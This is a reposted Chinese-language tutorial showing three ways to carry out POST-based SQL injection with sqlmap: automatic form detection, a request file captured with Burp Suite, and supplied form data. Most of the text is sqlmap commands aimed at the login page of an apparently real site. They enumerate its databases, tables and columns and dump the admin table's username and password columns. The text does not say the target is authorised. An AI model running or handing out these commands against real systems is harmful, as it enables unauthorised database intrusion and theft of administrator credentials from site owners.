Sqlmap POST注入 三种方法（转载）

不管怎么说？使用工具Sqlmap POST注入都会简单很多，具体说说Sqlmap POST注入 三种方法吧！

 

一、自动填写表单

自动填写表单是Sqlmap工具POST注入的第一种方法，具体步骤如下：

 

1、判断是否有post注入？

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --forms

出来的提示，一路回车就可以了！

 

结果如下图：

从这里，可以得到数据库是：Microsoft SQL Server，也就是mssql；

总之，一句话总结即可！IIS+ASP+windows+mssql；

 

这里重点说一下，Sql Server（mssql）数据库类似于mysql，数据库结构如下：

• 数据库A -> 表名 -> 列名 -> 数据
• 数据库B -> 表名 -> 列名 -> 数据

 

因此：mssql注入和mysql注入其实都差不多。

 

2、查找数据库

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --dbs

 

注意：如果遇到数据库非常多，而且我们也不知道管理用户名和密码存放在哪个数据库中？又应该怎么办呢？

 

查找当前的数据库

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --current-db

后面就不截图了，都很简单，这里找到了当前数据库是“vip_0730"。

 

3、查找表名

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 --tables

 

4、查找列名

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin --columns

 

5、爆出数据

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin -C user_name,user_pwd --dump

从这里就可以爆出 vip_0730 数据库 中 admin 表的 user_name 和 user_pwd 列的数据了。

 

二、Sqlmap结合BurpSuite

这是Sqlmap工具POST注入的第二种方法；这种方法要比自动填写表单准确性高些，但是：自动表单会简单快一点。具体步骤如下：

 

1、抓包

 

2、全选抓包的数据，右键 -> Copy 就可以保存到 1.txt 文档中；

3、sqlmap -r 指定文件

root@Kali：~# sqlmap -r '/home/1.txt'

 

4、查找当前数据库

root@Kali：~# sqlmap -r '/home/1.txt' --current-db

 

后面的这些和前面的就没什么区别了，就不继续讲重复的内容了。下面直接来说说Sqlmap POST注入第三种方法吧！

 

三、指定表单注入

指定表单注入是Sqlmap POST注入第三种方法，这个其实也需要抓包的。当然，不抓也可以，查看源代码等什么的也不是不可以，只是抓包比较精准而已。只要能知道指定的表单数据就可以了！

 

例如：我这里用指定表单注入，你只要能获取到“userid=aaa&passwd=bbbb”这个就可以了，不管你是用哪种途径获取到的都可以。

 

1、检测是否有注入？

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb"

 

2、查找当前数据库

root@Kali：~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb" --current-db

 ——————————————————————————————————————————————

转载地址：https://www.fujieace.com/penetration-test/sqlmap-post.html